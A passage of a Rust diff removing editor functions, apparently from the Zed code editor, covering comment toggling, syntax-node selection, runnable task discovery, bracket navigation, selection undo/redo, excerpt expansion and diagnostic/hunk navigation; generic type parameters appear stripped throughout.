self.select_previous( - &SelectPrevious { - replace_newest: true, - }, - window, - cx, - )?, - } - Ok(()) - } - - pub fn toggle_comments( - &mut self, - action: &ToggleComments, - window: &mut Window, - cx: &mut Context, - ) { - if self.read_only(cx) { - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let text_layout_details = &self.text_layout_details(window); - 
self.transact(window, cx, |this, window, cx| { - let mut selections = this.selections.all::(cx); - let mut edits = Vec::new(); - let mut selection_edit_ranges = Vec::new(); - let mut last_toggled_row = None; - let snapshot = this.buffer.read(cx).read(cx); - let empty_str: Arc = Arc::default(); - let mut suffixes_inserted = Vec::new(); - let ignore_indent = action.ignore_indent; - - fn comment_prefix_range( - snapshot: &MultiBufferSnapshot, - row: MultiBufferRow, - comment_prefix: &str, - comment_prefix_whitespace: &str, - ignore_indent: bool, - ) -> Range { - let indent_size = if ignore_indent { - 0 - } else { - snapshot.indent_size_for_line(row).len - }; - - let start = Point::new(row.0, indent_size); - - let mut line_bytes = snapshot - .bytes_in_range(start..snapshot.max_point()) - .flatten() - .copied(); - - // If this line currently begins with the line comment prefix, then record - // the range containing the prefix. - if line_bytes - .by_ref() - .take(comment_prefix.len()) - .eq(comment_prefix.bytes()) - { - // Include any whitespace that matches the comment prefix. 
- let matching_whitespace_len = line_bytes - .zip(comment_prefix_whitespace.bytes()) - .take_while(|(a, b)| a == b) - .count() as u32; - let end = Point::new( - start.row, - start.column + comment_prefix.len() as u32 + matching_whitespace_len, - ); - start..end - } else { - start..start - } - } - - fn comment_suffix_range( - snapshot: &MultiBufferSnapshot, - row: MultiBufferRow, - comment_suffix: &str, - comment_suffix_has_leading_space: bool, - ) -> Range { - let end = Point::new(row.0, snapshot.line_len(row)); - let suffix_start_column = end.column.saturating_sub(comment_suffix.len() as u32); - - let mut line_end_bytes = snapshot - .bytes_in_range(Point::new(end.row, suffix_start_column.saturating_sub(1))..end) - .flatten() - .copied(); - - let leading_space_len = if suffix_start_column > 0 - && line_end_bytes.next() == Some(b' ') - && comment_suffix_has_leading_space - { - 1 - } else { - 0 - }; - - // If this line currently begins with the line comment prefix, then record - // the range containing the prefix. - if line_end_bytes.by_ref().eq(comment_suffix.bytes()) { - let start = Point::new(end.row, suffix_start_column - leading_space_len); - start..end - } else { - end..end - } - } - - // TODO: Handle selections that cross excerpts - for selection in &mut selections { - let start_column = snapshot - .indent_size_for_line(MultiBufferRow(selection.start.row)) - .len; - let language = if let Some(language) = - snapshot.language_scope_at(Point::new(selection.start.row, start_column)) - { - language - } else { - continue; - }; - - selection_edit_ranges.clear(); - - // If multiple selections contain a given row, avoid processing that - // row more than once. 
- let mut start_row = MultiBufferRow(selection.start.row); - if last_toggled_row == Some(start_row) { - start_row = start_row.next_row(); - } - let end_row = - if selection.end.row > selection.start.row && selection.end.column == 0 { - MultiBufferRow(selection.end.row - 1) - } else { - MultiBufferRow(selection.end.row) - }; - last_toggled_row = Some(end_row); - - if start_row > end_row { - continue; - } - - // If the language has line comments, toggle those. - let mut full_comment_prefixes = language.line_comment_prefixes().to_vec(); - - // If ignore_indent is set, trim spaces from the right side of all full_comment_prefixes - if ignore_indent { - full_comment_prefixes = full_comment_prefixes - .into_iter() - .map(|s| Arc::from(s.trim_end())) - .collect(); - } - - if !full_comment_prefixes.is_empty() { - let first_prefix = full_comment_prefixes - .first() - .expect("prefixes is non-empty"); - let prefix_trimmed_lengths = full_comment_prefixes - .iter() - .map(|p| p.trim_end_matches(' ').len()) - .collect::>(); - - let mut all_selection_lines_are_comments = true; - - for row in start_row.0..=end_row.0 { - let row = MultiBufferRow(row); - if start_row < end_row && snapshot.is_line_blank(row) { - continue; - } - - let prefix_range = full_comment_prefixes - .iter() - .zip(prefix_trimmed_lengths.iter().copied()) - .map(|(prefix, trimmed_prefix_len)| { - comment_prefix_range( - snapshot.deref(), - row, - &prefix[..trimmed_prefix_len], - &prefix[trimmed_prefix_len..], - ignore_indent, - ) - }) - .max_by_key(|range| range.end.column - range.start.column) - .expect("prefixes is non-empty"); - - if prefix_range.is_empty() { - all_selection_lines_are_comments = false; - } - - selection_edit_ranges.push(prefix_range); - } - - if all_selection_lines_are_comments { - edits.extend( - selection_edit_ranges - .iter() - .cloned() - .map(|range| (range, empty_str.clone())), - ); - } else { - let min_column = selection_edit_ranges - .iter() - .map(|range| range.start.column) - .min() 
- .unwrap_or(0); - edits.extend(selection_edit_ranges.iter().map(|range| { - let position = Point::new(range.start.row, min_column); - (position..position, first_prefix.clone()) - })); - } - } else if let Some((full_comment_prefix, comment_suffix)) = - language.block_comment_delimiters() - { - let comment_prefix = full_comment_prefix.trim_end_matches(' '); - let comment_prefix_whitespace = &full_comment_prefix[comment_prefix.len()..]; - let prefix_range = comment_prefix_range( - snapshot.deref(), - start_row, - comment_prefix, - comment_prefix_whitespace, - ignore_indent, - ); - let suffix_range = comment_suffix_range( - snapshot.deref(), - end_row, - comment_suffix.trim_start_matches(' '), - comment_suffix.starts_with(' '), - ); - - if prefix_range.is_empty() || suffix_range.is_empty() { - edits.push(( - prefix_range.start..prefix_range.start, - full_comment_prefix.clone(), - )); - edits.push((suffix_range.end..suffix_range.end, comment_suffix.clone())); - suffixes_inserted.push((end_row, comment_suffix.len())); - } else { - edits.push((prefix_range, empty_str.clone())); - edits.push((suffix_range, empty_str.clone())); - } - } else { - continue; - } - } - - drop(snapshot); - this.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, None, cx); - }); - - // Adjust selections so that they end before any comment suffixes that - // were inserted. 
- let mut suffixes_inserted = suffixes_inserted.into_iter().peekable(); - let mut selections = this.selections.all::(cx); - let snapshot = this.buffer.read(cx).read(cx); - for selection in &mut selections { - while let Some((row, suffix_len)) = suffixes_inserted.peek().copied() { - match row.cmp(&MultiBufferRow(selection.end.row)) { - Ordering::Less => { - suffixes_inserted.next(); - continue; - } - Ordering::Greater => break, - Ordering::Equal => { - if selection.end.column == snapshot.line_len(row) { - if selection.is_empty() { - selection.start.column -= suffix_len as u32; - } - selection.end.column -= suffix_len as u32; - } - break; - } - } - } - } - - drop(snapshot); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - - let selections = this.selections.all::(cx); - let selections_on_single_row = selections.windows(2).all(|selections| { - selections[0].start.row == selections[1].start.row - && selections[0].end.row == selections[1].end.row - && selections[0].start.row == selections[0].end.row - }); - let selections_selecting = selections - .iter() - .any(|selection| selection.start != selection.end); - let advance_downwards = action.advance_downwards - && selections_on_single_row - && !selections_selecting - && !matches!(this.mode, EditorMode::SingleLine { .. 
}); - - if advance_downwards { - let snapshot = this.buffer.read(cx).snapshot(cx); - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|display_snapshot, display_point, _| { - let mut point = display_point.to_point(display_snapshot); - point.row += 1; - point = snapshot.clip_point(point, Bias::Left); - let display_point = point.to_display_point(display_snapshot); - let goal = SelectionGoal::HorizontalPosition( - display_snapshot - .x_for_display_point(display_point, text_layout_details) - .into(), - ); - (display_point, goal) - }) - }); - } - }); - } - - pub fn select_enclosing_symbol( - &mut self, - _: &SelectEnclosingSymbol, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let buffer = self.buffer.read(cx).snapshot(cx); - let old_selections = self.selections.all::(cx).into_boxed_slice(); - - fn update_selection( - selection: &Selection, - buffer_snap: &MultiBufferSnapshot, - ) -> Option> { - let cursor = selection.head(); - let (_buffer_id, symbols) = buffer_snap.symbols_containing(cursor, None)?; - for symbol in symbols.iter().rev() { - let start = symbol.range.start.to_offset(buffer_snap); - let end = symbol.range.end.to_offset(buffer_snap); - let new_range = start..end; - if start < selection.start || end > selection.end { - return Some(Selection { - id: selection.id, - start: new_range.start, - end: new_range.end, - goal: SelectionGoal::None, - reversed: selection.reversed, - }); - } - } - None - } - - let mut selected_larger_symbol = false; - let new_selections = old_selections - .iter() - .map(|selection| match update_selection(selection, &buffer) { - Some(new_selection) => { - if new_selection.range() != selection.range() { - selected_larger_symbol = true; - } - new_selection - } - None => selection.clone(), - }) - .collect::>(); - - if selected_larger_symbol { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - 
s.select(new_selections); - }); - } - } - - pub fn select_larger_syntax_node( - &mut self, - _: &SelectLargerSyntaxNode, - window: &mut Window, - cx: &mut Context, - ) { - let Some(visible_row_count) = self.visible_row_count() else { - return; - }; - let old_selections: Box<[_]> = self.selections.all::(cx).into(); - if old_selections.is_empty() { - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = self.buffer.read(cx).snapshot(cx); - - let mut selected_larger_node = false; - let mut new_selections = old_selections - .iter() - .map(|selection| { - let old_range = selection.start..selection.end; - - if let Some((node, _)) = buffer.syntax_ancestor(old_range.clone()) { - // manually select word at selection - if ["string_content", "inline"].contains(&node.kind()) { - let word_range = { - let display_point = buffer - .offset_to_point(old_range.start) - .to_display_point(&display_map); - let Range { start, end } = - movement::surrounding_word(&display_map, display_point); - start.to_point(&display_map).to_offset(&buffer) - ..end.to_point(&display_map).to_offset(&buffer) - }; - // ignore if word is already selected - if !word_range.is_empty() && old_range != word_range { - let last_word_range = { - let display_point = buffer - .offset_to_point(old_range.end) - .to_display_point(&display_map); - let Range { start, end } = - movement::surrounding_word(&display_map, display_point); - start.to_point(&display_map).to_offset(&buffer) - ..end.to_point(&display_map).to_offset(&buffer) - }; - // only select word if start and end point belongs to same word - if word_range == last_word_range { - selected_larger_node = true; - return Selection { - id: selection.id, - start: word_range.start, - end: word_range.end, - goal: SelectionGoal::None, - reversed: selection.reversed, - }; - } - } - } - } - - let mut new_range = old_range.clone(); - let mut new_node = 
None; - while let Some((node, containing_range)) = buffer.syntax_ancestor(new_range.clone()) - { - new_node = Some(node); - new_range = match containing_range { - MultiOrSingleBufferOffsetRange::Single(_) => break, - MultiOrSingleBufferOffsetRange::Multi(range) => range, - }; - if !display_map.intersects_fold(new_range.start) - && !display_map.intersects_fold(new_range.end) - { - break; - } - } - - if let Some(node) = new_node { - // Log the ancestor, to support using this action as a way to explore TreeSitter - // nodes. Parent and grandparent are also logged because this operation will not - // visit nodes that have the same range as their parent. - log::info!("Node: {node:?}"); - let parent = node.parent(); - log::info!("Parent: {parent:?}"); - let grandparent = parent.and_then(|x| x.parent()); - log::info!("Grandparent: {grandparent:?}"); - } - - selected_larger_node |= new_range != old_range; - Selection { - id: selection.id, - start: new_range.start, - end: new_range.end, - goal: SelectionGoal::None, - reversed: selection.reversed, - } - }) - .collect::>(); - - if !selected_larger_node { - return; // don't put this call in the history - } - - // scroll based on transformation done to the last selection created by the user - let (last_old, last_new) = old_selections - .last() - .zip(new_selections.last().cloned()) - .expect("old_selections isn't empty"); - - // revert selection - let is_selection_reversed = { - let should_newest_selection_be_reversed = last_old.start != last_new.start; - new_selections.last_mut().expect("checked above").reversed = - should_newest_selection_be_reversed; - should_newest_selection_be_reversed - }; - - if selected_larger_node { - self.select_syntax_node_history.disable_clearing = true; - self.change_selections(None, window, cx, |s| { - s.select(new_selections.clone()); - }); - self.select_syntax_node_history.disable_clearing = false; - } - - let start_row = last_new.start.to_display_point(&display_map).row().0; - let end_row = 
last_new.end.to_display_point(&display_map).row().0; - let selection_height = end_row - start_row + 1; - let scroll_margin_rows = self.vertical_scroll_margin() as u32; - - let fits_on_the_screen = visible_row_count >= selection_height + scroll_margin_rows * 2; - let scroll_behavior = if fits_on_the_screen { - self.request_autoscroll(Autoscroll::fit(), cx); - SelectSyntaxNodeScrollBehavior::FitSelection - } else if is_selection_reversed { - self.scroll_cursor_top(&ScrollCursorTop, window, cx); - SelectSyntaxNodeScrollBehavior::CursorTop - } else { - self.scroll_cursor_bottom(&ScrollCursorBottom, window, cx); - SelectSyntaxNodeScrollBehavior::CursorBottom - }; - - self.select_syntax_node_history.push(( - old_selections, - scroll_behavior, - is_selection_reversed, - )); - } - - pub fn select_smaller_syntax_node( - &mut self, - _: &SelectSmallerSyntaxNode, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - if let Some((mut selections, scroll_behavior, is_selection_reversed)) = - self.select_syntax_node_history.pop() - { - if let Some(selection) = selections.last_mut() { - selection.reversed = is_selection_reversed; - } - - self.select_syntax_node_history.disable_clearing = true; - self.change_selections(None, window, cx, |s| { - s.select(selections.to_vec()); - }); - self.select_syntax_node_history.disable_clearing = false; - - match scroll_behavior { - SelectSyntaxNodeScrollBehavior::CursorTop => { - self.scroll_cursor_top(&ScrollCursorTop, window, cx); - } - SelectSyntaxNodeScrollBehavior::FitSelection => { - self.request_autoscroll(Autoscroll::fit(), cx); - } - SelectSyntaxNodeScrollBehavior::CursorBottom => { - self.scroll_cursor_bottom(&ScrollCursorBottom, window, cx); - } - } - } - } - - fn refresh_runnables(&mut self, window: &mut Window, cx: &mut Context) -> Task<()> { - if !EditorSettings::get_global(cx).gutter.runnables { - self.clear_tasks(); - return Task::ready(()); - } - let project = 
self.project.as_ref().map(Entity::downgrade); - let task_sources = self.lsp_task_sources(cx); - cx.spawn_in(window, async move |editor, cx| { - cx.background_executor().timer(UPDATE_DEBOUNCE).await; - let Some(project) = project.and_then(|p| p.upgrade()) else { - return; - }; - let Ok(display_snapshot) = editor.update(cx, |this, cx| { - this.display_map.update(cx, |map, cx| map.snapshot(cx)) - }) else { - return; - }; - - let hide_runnables = project - .update(cx, |project, cx| { - // Do not display any test indicators in non-dev server remote projects. - project.is_via_collab() && project.ssh_connection_string(cx).is_none() - }) - .unwrap_or(true); - if hide_runnables { - return; - } - let new_rows = - cx.background_spawn({ - let snapshot = display_snapshot.clone(); - async move { - Self::fetch_runnable_ranges(&snapshot, Anchor::min()..Anchor::max()) - } - }) - .await; - let Ok(lsp_tasks) = - cx.update(|_, cx| crate::lsp_tasks(project.clone(), &task_sources, None, cx)) - else { - return; - }; - let lsp_tasks = lsp_tasks.await; - - let Ok(mut lsp_tasks_by_rows) = cx.update(|_, cx| { - lsp_tasks - .into_iter() - .flat_map(|(kind, tasks)| { - tasks.into_iter().filter_map(move |(location, task)| { - Some((kind.clone(), location?, task)) - }) - }) - .fold(HashMap::default(), |mut acc, (kind, location, task)| { - let buffer = location.target.buffer; - let buffer_snapshot = buffer.read(cx).snapshot(); - let offset = display_snapshot.buffer_snapshot.excerpts().find_map( - |(excerpt_id, snapshot, _)| { - if snapshot.remote_id() == buffer_snapshot.remote_id() { - display_snapshot - .buffer_snapshot - .anchor_in_excerpt(excerpt_id, location.target.range.start) - } else { - None - } - }, - ); - if let Some(offset) = offset { - let task_buffer_range = - location.target.range.to_point(&buffer_snapshot); - let context_buffer_range = - task_buffer_range.to_offset(&buffer_snapshot); - let context_range = BufferOffset(context_buffer_range.start) - 
..BufferOffset(context_buffer_range.end); - - acc.entry((buffer_snapshot.remote_id(), task_buffer_range.start.row)) - .or_insert_with(|| RunnableTasks { - templates: Vec::new(), - offset, - column: task_buffer_range.start.column, - extra_variables: HashMap::default(), - context_range, - }) - .templates - .push((kind, task.original_task().clone())); - } - - acc - }) - }) else { - return; - }; - - let rows = Self::runnable_rows(project, display_snapshot, new_rows, cx.clone()); - editor - .update(cx, |editor, _| { - editor.clear_tasks(); - for (key, mut value) in rows { - if let Some(lsp_tasks) = lsp_tasks_by_rows.remove(&key) { - value.templates.extend(lsp_tasks.templates); - } - - editor.insert_tasks(key, value); - } - for (key, value) in lsp_tasks_by_rows { - editor.insert_tasks(key, value); - } - }) - .ok(); - }) - } - fn fetch_runnable_ranges( - snapshot: &DisplaySnapshot, - range: Range, - ) -> Vec { - snapshot.buffer_snapshot.runnable_ranges(range).collect() - } - - fn runnable_rows( - project: Entity, - snapshot: DisplaySnapshot, - runnable_ranges: Vec, - mut cx: AsyncWindowContext, - ) -> Vec<((BufferId, BufferRow), RunnableTasks)> { - runnable_ranges - .into_iter() - .filter_map(|mut runnable| { - let tasks = cx - .update(|_, cx| Self::templates_with_tags(&project, &mut runnable.runnable, cx)) - .ok()?; - if tasks.is_empty() { - return None; - } - - let point = runnable.run_range.start.to_point(&snapshot.buffer_snapshot); - - let row = snapshot - .buffer_snapshot - .buffer_line_for_row(MultiBufferRow(point.row))? 
- .1 - .start - .row; - - let context_range = - BufferOffset(runnable.full_range.start)..BufferOffset(runnable.full_range.end); - Some(( - (runnable.buffer_id, row), - RunnableTasks { - templates: tasks, - offset: snapshot - .buffer_snapshot - .anchor_before(runnable.run_range.start), - context_range, - column: point.column, - extra_variables: runnable.extra_captures, - }, - )) - }) - .collect() - } - - fn templates_with_tags( - project: &Entity, - runnable: &mut Runnable, - cx: &mut App, - ) -> Vec<(TaskSourceKind, TaskTemplate)> { - let (inventory, worktree_id, file) = project.read_with(cx, |project, cx| { - let (worktree_id, file) = project - .buffer_for_id(runnable.buffer, cx) - .and_then(|buffer| buffer.read(cx).file()) - .map(|file| (file.worktree_id(cx), file.clone())) - .unzip(); - - ( - project.task_store().read(cx).task_inventory().cloned(), - worktree_id, - file, - ) - }); - - let mut templates_with_tags = mem::take(&mut runnable.tags) - .into_iter() - .flat_map(|RunnableTag(tag)| { - inventory - .as_ref() - .into_iter() - .flat_map(|inventory| { - inventory.read(cx).list_tasks( - file.clone(), - Some(runnable.language.clone()), - worktree_id, - cx, - ) - }) - .filter(move |(_, template)| { - template.tags.iter().any(|source_tag| source_tag == &tag) - }) - }) - .sorted_by_key(|(kind, _)| kind.to_owned()) - .collect::>(); - if let Some((leading_tag_source, _)) = templates_with_tags.first() { - // Strongest source wins; if we have worktree tag binding, prefer that to - // global and language bindings; - // if we have a global binding, prefer that to language binding. 
- let first_mismatch = templates_with_tags - .iter() - .position(|(tag_source, _)| tag_source != leading_tag_source); - if let Some(index) = first_mismatch { - templates_with_tags.truncate(index); - } - } - - templates_with_tags - } - - pub fn move_to_enclosing_bracket( - &mut self, - _: &MoveToEnclosingBracket, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_offsets_with(|snapshot, selection| { - let Some(enclosing_bracket_ranges) = - snapshot.enclosing_bracket_ranges(selection.start..selection.end) - else { - return; - }; - - let mut best_length = usize::MAX; - let mut best_inside = false; - let mut best_in_bracket_range = false; - let mut best_destination = None; - for (open, close) in enclosing_bracket_ranges { - let close = close.to_inclusive(); - let length = close.end() - open.start; - let inside = selection.start >= open.end && selection.end <= *close.start(); - let in_bracket_range = open.to_inclusive().contains(&selection.head()) - || close.contains(&selection.head()); - - // If best is next to a bracket and current isn't, skip - if !in_bracket_range && best_in_bracket_range { - continue; - } - - // Prefer smaller lengths unless best is inside and current isn't - if length > best_length && (best_inside || !inside) { - continue; - } - - best_length = length; - best_inside = inside; - best_in_bracket_range = in_bracket_range; - best_destination = Some( - if close.contains(&selection.start) && close.contains(&selection.end) { - if inside { open.end } else { open.start } - } else if inside { - *close.start() - } else { - *close.end() - }, - ); - } - - if let Some(destination) = best_destination { - selection.collapse_to(destination, SelectionGoal::None); - } - }) - }); - } - - pub fn undo_selection( - &mut self, - _: &UndoSelection, - window: &mut Window, - cx: &mut Context, - ) { - 
self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.end_selection(window, cx); - self.selection_history.mode = SelectionHistoryMode::Undoing; - if let Some(entry) = self.selection_history.undo_stack.pop_back() { - self.change_selections(None, window, cx, |s| { - s.select_anchors(entry.selections.to_vec()) - }); - self.select_next_state = entry.select_next_state; - self.select_prev_state = entry.select_prev_state; - self.add_selections_state = entry.add_selections_state; - self.request_autoscroll(Autoscroll::newest(), cx); - } - self.selection_history.mode = SelectionHistoryMode::Normal; - } - - pub fn redo_selection( - &mut self, - _: &RedoSelection, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.end_selection(window, cx); - self.selection_history.mode = SelectionHistoryMode::Redoing; - if let Some(entry) = self.selection_history.redo_stack.pop_back() { - self.change_selections(None, window, cx, |s| { - s.select_anchors(entry.selections.to_vec()) - }); - self.select_next_state = entry.select_next_state; - self.select_prev_state = entry.select_prev_state; - self.add_selections_state = entry.add_selections_state; - self.request_autoscroll(Autoscroll::newest(), cx); - } - self.selection_history.mode = SelectionHistoryMode::Normal; - } - - pub fn expand_excerpts( - &mut self, - action: &ExpandExcerpts, - _: &mut Window, - cx: &mut Context, - ) { - self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::UpAndDown, cx) - } - - pub fn expand_excerpts_down( - &mut self, - action: &ExpandExcerptsDown, - _: &mut Window, - cx: &mut Context, - ) { - self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::Down, cx) - } - - pub fn expand_excerpts_up( - &mut self, - action: &ExpandExcerptsUp, - _: &mut Window, - cx: &mut Context, - ) { - self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::Up, cx) - } - - pub fn 
expand_excerpts_for_direction( - &mut self, - lines: u32, - direction: ExpandExcerptDirection, - - cx: &mut Context, - ) { - let selections = self.selections.disjoint_anchors(); - - let lines = if lines == 0 { - EditorSettings::get_global(cx).expand_excerpt_lines - } else { - lines - }; - - self.buffer.update(cx, |buffer, cx| { - let snapshot = buffer.snapshot(cx); - let mut excerpt_ids = selections - .iter() - .flat_map(|selection| snapshot.excerpt_ids_for_range(selection.range())) - .collect::>(); - excerpt_ids.sort(); - excerpt_ids.dedup(); - buffer.expand_excerpts(excerpt_ids, lines, direction, cx) - }) - } - - pub fn expand_excerpt( - &mut self, - excerpt: ExcerptId, - direction: ExpandExcerptDirection, - window: &mut Window, - cx: &mut Context, - ) { - let current_scroll_position = self.scroll_position(cx); - let lines_to_expand = EditorSettings::get_global(cx).expand_excerpt_lines; - let mut should_scroll_up = false; - - if direction == ExpandExcerptDirection::Down { - let multi_buffer = self.buffer.read(cx); - let snapshot = multi_buffer.snapshot(cx); - if let Some(buffer_id) = snapshot.buffer_id_for_excerpt(excerpt) { - if let Some(buffer) = multi_buffer.buffer(buffer_id) { - if let Some(excerpt_range) = snapshot.buffer_range_for_excerpt(excerpt) { - let buffer_snapshot = buffer.read(cx).snapshot(); - let excerpt_end_row = - Point::from_anchor(&excerpt_range.end, &buffer_snapshot).row; - let last_row = buffer_snapshot.max_point().row; - let lines_below = last_row.saturating_sub(excerpt_end_row); - should_scroll_up = lines_below >= lines_to_expand; - } - } - } - } - - self.buffer.update(cx, |buffer, cx| { - buffer.expand_excerpts([excerpt], lines_to_expand, direction, cx) - }); - - if should_scroll_up { - let new_scroll_position = - current_scroll_position + gpui::Point::new(0.0, lines_to_expand as f32); - self.set_scroll_position(new_scroll_position, window, cx); - } - } - - pub fn go_to_singleton_buffer_point( - &mut self, - point: Point, - window: &mut 
Window, - cx: &mut Context, - ) { - self.go_to_singleton_buffer_range(point..point, window, cx); - } - - pub fn go_to_singleton_buffer_range( - &mut self, - range: Range, - window: &mut Window, - cx: &mut Context, - ) { - let multibuffer = self.buffer().read(cx); - let Some(buffer) = multibuffer.as_singleton() else { - return; - }; - let Some(start) = multibuffer.buffer_point_to_anchor(&buffer, range.start, cx) else { - return; - }; - let Some(end) = multibuffer.buffer_point_to_anchor(&buffer, range.end, cx) else { - return; - }; - self.change_selections(Some(Autoscroll::center()), window, cx, |s| { - s.select_anchor_ranges([start..end]) - }); - } - - pub fn go_to_diagnostic( - &mut self, - _: &GoToDiagnostic, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.go_to_diagnostic_impl(Direction::Next, window, cx) - } - - pub fn go_to_prev_diagnostic( - &mut self, - _: &GoToPreviousDiagnostic, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.go_to_diagnostic_impl(Direction::Prev, window, cx) - } - - pub fn go_to_diagnostic_impl( - &mut self, - direction: Direction, - window: &mut Window, - cx: &mut Context, - ) { - let buffer = self.buffer.read(cx).snapshot(cx); - let selection = self.selections.newest::(cx); - - let mut active_group_id = None; - if let ActiveDiagnostic::Group(active_group) = &self.active_diagnostics { - if active_group.active_range.start.to_offset(&buffer) == selection.start { - active_group_id = Some(active_group.group_id); - } - } - - fn filtered( - snapshot: EditorSnapshot, - diagnostics: impl Iterator>, - ) -> impl Iterator> { - diagnostics - .filter(|entry| entry.range.start != entry.range.end) - .filter(|entry| !entry.diagnostic.is_unnecessary) - .filter(move |entry| !snapshot.intersects_fold(entry.range.start)) - } - - let snapshot = self.snapshot(window, cx); - let before = filtered( - 
snapshot.clone(), - buffer - .diagnostics_in_range(0..selection.start) - .filter(|entry| entry.range.start <= selection.start), - ); - let after = filtered( - snapshot, - buffer - .diagnostics_in_range(selection.start..buffer.len()) - .filter(|entry| entry.range.start >= selection.start), - ); - - let mut found: Option> = None; - if direction == Direction::Prev { - 'outer: for prev_diagnostics in [before.collect::>(), after.collect::>()] - { - for diagnostic in prev_diagnostics.into_iter().rev() { - if diagnostic.range.start != selection.start - || active_group_id - .is_some_and(|active| diagnostic.diagnostic.group_id < active) - { - found = Some(diagnostic); - break 'outer; - } - } - } - } else { - for diagnostic in after.chain(before) { - if diagnostic.range.start != selection.start - || active_group_id.is_some_and(|active| diagnostic.diagnostic.group_id > active) - { - found = Some(diagnostic); - break; - } - } - } - let Some(next_diagnostic) = found else { - return; - }; - - let Some(buffer_id) = buffer.anchor_after(next_diagnostic.range.start).buffer_id else { - return; - }; - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges(vec![ - next_diagnostic.range.start..next_diagnostic.range.start, - ]) - }); - self.activate_diagnostics(buffer_id, next_diagnostic, window, cx); - self.refresh_inline_completion(false, true, window, cx); - } - - fn go_to_next_hunk(&mut self, _: &GoToHunk, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let snapshot = self.snapshot(window, cx); - let selection = self.selections.newest::(cx); - self.go_to_hunk_before_or_after_position( - &snapshot, - selection.head(), - Direction::Next, - window, - cx, - ); - } - - pub fn go_to_hunk_before_or_after_position( - &mut self, - snapshot: &EditorSnapshot, - position: Point, - direction: Direction, - window: &mut Window, - cx: &mut Context, - ) { - let row = if direction == Direction::Next { - 
self.hunk_after_position(snapshot, position) - .map(|hunk| hunk.row_range.start) - } else { - self.hunk_before_position(snapshot, position) - }; - - if let Some(row) = row { - let destination = Point::new(row.0, 0); - let autoscroll = Autoscroll::center(); - - self.unfold_ranges(&[destination..destination], false, false, cx); - self.change_selections(Some(autoscroll), window, cx, |s| { - s.select_ranges([destination..destination]); - }); - } - } - - fn hunk_after_position( - &mut self, - snapshot: &EditorSnapshot, - position: Point, - ) -> Option { - snapshot - .buffer_snapshot - .diff_hunks_in_range(position..snapshot.buffer_snapshot.max_point()) - .find(|hunk| hunk.row_range.start.0 > position.row) - .or_else(|| { - snapshot - .buffer_snapshot - .diff_hunks_in_range(Point::zero()..position) - .find(|hunk| hunk.row_range.end.0 < position.row) - }) - } - - fn go_to_prev_hunk( - &mut self, - _: &GoToPreviousHunk, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let snapshot = self.snapshot(window, cx); - let selection = self.selections.newest::(cx); - self.go_to_hunk_before_or_after_position( - &snapshot, - selection.head(), - Direction::Prev, - window, - cx, - ); - } - - fn hunk_before_position( - &mut self, - snapshot: &EditorSnapshot, - position: Point, - ) -> Option { - snapshot - .buffer_snapshot - .diff_hunk_before(position) - .or_else(|| snapshot.buffer_snapshot.diff_hunk_before(Point::MAX)) - } - - fn go_to_next_change( - &mut self, - _: &GoToNextChange, - window: &mut Window, - cx: &mut Context, - ) { - if let Some(selections) = self - .change_list - .next_change(1, Direction::Next) - .map(|s| s.to_vec()) - { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - let map = s.display_map(); - s.select_display_ranges(selections.iter().map(|a| { - let point = a.to_display_point(&map); - point..point - })) - }) - } - } - - fn go_to_previous_change( - &mut self, - _: 
&GoToPreviousChange, - window: &mut Window, - cx: &mut Context, - ) { - if let Some(selections) = self - .change_list - .next_change(1, Direction::Prev) - .map(|s| s.to_vec()) - { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - let map = s.display_map(); - s.select_display_ranges(selections.iter().map(|a| { - let point = a.to_display_point(&map); - point..point - })) - }) - } - } - - fn go_to_line( - &mut self, - position: Anchor, - highlight_color: Option, - window: &mut Window, - cx: &mut Context, - ) { - let snapshot = self.snapshot(window, cx).display_snapshot; - let position = position.to_point(&snapshot.buffer_snapshot); - let start = snapshot - .buffer_snapshot - .clip_point(Point::new(position.row, 0), Bias::Left); - let end = start + Point::new(1, 0); - let start = snapshot.buffer_snapshot.anchor_before(start); - let end = snapshot.buffer_snapshot.anchor_before(end); - - self.highlight_rows::( - start..end, - highlight_color - .unwrap_or_else(|| cx.theme().colors().editor_highlighted_line_background), - Default::default(), - cx, - ); - self.request_autoscroll(Autoscroll::center().for_anchor(start), cx); - } - - pub fn go_to_definition( - &mut self, - _: &GoToDefinition, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - let definition = - self.go_to_definition_of_kind(GotoDefinitionKind::Symbol, false, window, cx); - let fallback_strategy = EditorSettings::get_global(cx).go_to_definition_fallback; - cx.spawn_in(window, async move |editor, cx| { - if definition.await? == Navigated::Yes { - return Ok(Navigated::Yes); - } - match fallback_strategy { - GoToDefinitionFallback::None => Ok(Navigated::No), - GoToDefinitionFallback::FindAllReferences => { - match editor.update_in(cx, |editor, window, cx| { - 